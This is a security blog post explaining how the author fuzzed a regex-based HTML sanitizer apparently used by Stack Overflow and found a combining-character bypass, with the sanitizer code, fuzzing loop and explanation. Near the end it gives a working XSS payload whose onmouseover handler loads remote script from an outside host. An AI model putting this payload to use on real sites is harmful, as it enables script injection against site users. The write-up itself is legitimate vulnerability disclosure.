Hacking stackoverflow.com's HTML sanitizer
Published: 2014-02-19
Finding the code for the sanitizer
While looking around for more things to mess with, I came across a post by Jeff Atwood that mentioned an HTML sanitizer he'd written.
I was able to write a no-nonsense, special purpose HTML sanitizer in about 25 lines of code
Guessing that this might be the code used by Stack Overflow to sanitize the HTML, I figured I'd see if it had any weaknesses.
Here's what it looked like:
private static Regex _tags = new Regex("<[^>]*(>|$)", RegexOptions.Singleline | RegexOptions.ExplicitCapture | RegexOptions.Compiled);
private static Regex _whitelist = new Regex(@"
^</?(a|b(lockquote)?|code|em|h(1|2|3)|i|li|ol|p(re)?|s(ub|up|trong|trike)?|ul)>$
|^<(b|h)r\s?/?>$
|^<a[^>]+>$
|^<img[^>]+/?>$",
RegexOptions.Singleline | RegexOptions.IgnorePatternWhitespace |
RegexOptions.ExplicitCapture | RegexOptions.Compiled);
/// <summary>
/// sanitize any potentially dangerous tags from the provided raw HTML input using
/// a whitelist based approach, leaving the "safe" HTML tags
/// </summary>
public static string Sanitize(string html)
{
var tagname = "";
Match tag;
var tags = _tags.Matches(html);
// iterate through all HTML tags in the input
for (int i = tags.Count-1; i > -1; i--)
{
tag = tags[i];
tagname = tag.Value.ToLower();
if (!_whitelist.IsMatch(tagname))
{
// not on our whitelist? I SAY GOOD DAY TO YOU, SIR. GOOD DAY!
html = html.Remove(tag.Index, tag.Length);
}
else if (tagname.StartsWith("<a"))
{
// detailed <a> tag checking
if (!IsMatch(tagname,
@"<a\s
href=""(\#\d+|(https?|ftp)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+)""
(\stitle=""[^""]+"")?\s?>"))
{
html = html.Remove(tag.Index, tag.Length);
}
}
else if (tagname.StartsWith("<img"))
{
// detailed <img> tag checking
if (!IsMatch(tagname,
@"<img\s
src=""https?://[-A-Za-z0-9+&@#/%?=~_|!:,.;]+""
(\swidth=""\d{1,3}"")?
(\sheight=""\d{1,3}"")?
(\salt=""[^""]*"")?
(\stitle=""[^""]*"")?
\s?/?>"))
{
html = html.Remove(tag.Index, tag.Length);
}
}
}
return html;
}
So… what's the problem?
I didn't immediately see anything wrong with Jeff's approach… so I tried to write some code that was smarter than me:
while(true) {
// Generate a bunch of random HTML by concatenating tags,
// attributes and random characters
string testHtml = GenerateTestHtml();
string sanitizedHtml = Sanitize(testHtml);
// See if the "sanitized" HTML contains anything that looks
// dangerous, like a <script> tag, or a tag with an event
// handler
if(LooksDangerous(sanitizedHtml)) {
Output(testHtml, sanitizedHtml);
break;
}
}
I ran this, and in a few seconds… I got a hit!
Unfortunately, the input it found was several thousand characters long, and mostly looked like noise… so I had to write a little more code:
for(int i = testHtml.Length - 1; i >= 0; i--) {
string modified = testHtml.Remove(i, 1);
// See if the input still results in
// dangerous looking HTML
if(LooksDangerous(Sanitize(modified))) {
testHtml = modified;
}
}
After running that, the long input had boiled down to this:
<img ̊ onmouseover="">
Interesting. What is the ̊
character doing
there?
If we check that input against different parts of the sanitization code, we see that
Regex.isMatch("<img ̊", /^<img[^>]+/?>$/) ==
true
… but …
"<img ̊".StartsWith("<img") == false
Why is this? Well, ̊
is a combining
character, so depending on how you interpret the string, it
might look like <img ̊
or <img̊
.
That discrepency meant that the tag could pass the whitelist, but
wasn't eligible for the "detailed <img> checking"
How would you exploit this?
There are undoubtedly lots of bad things you could do, one example would be:
<img ̊
style="display:block;width:100%;height:100%;"
onmouseover="$.getScript('http://danlec.com/xss.js')"
>
Should have known…
Interestingly, the somewhat famous answer to a question about using RegEx to parse HTML makes heavy use of combining characters.
Maybe bobince was trying to tell us something…
About the author:
I'm Daniel LeCheminant, a developer at Trello Inc.
You can follow me on Twitter or e-mail me.
Most recent post:
- A bug in the Sundown and Redcarpet markdown parsers may lead to XSS
- XSS via a spoofed React element
- HackerOne's First XSS
- Hacking stackoverflow.com's HTML sanitizer
The most popular things I've written: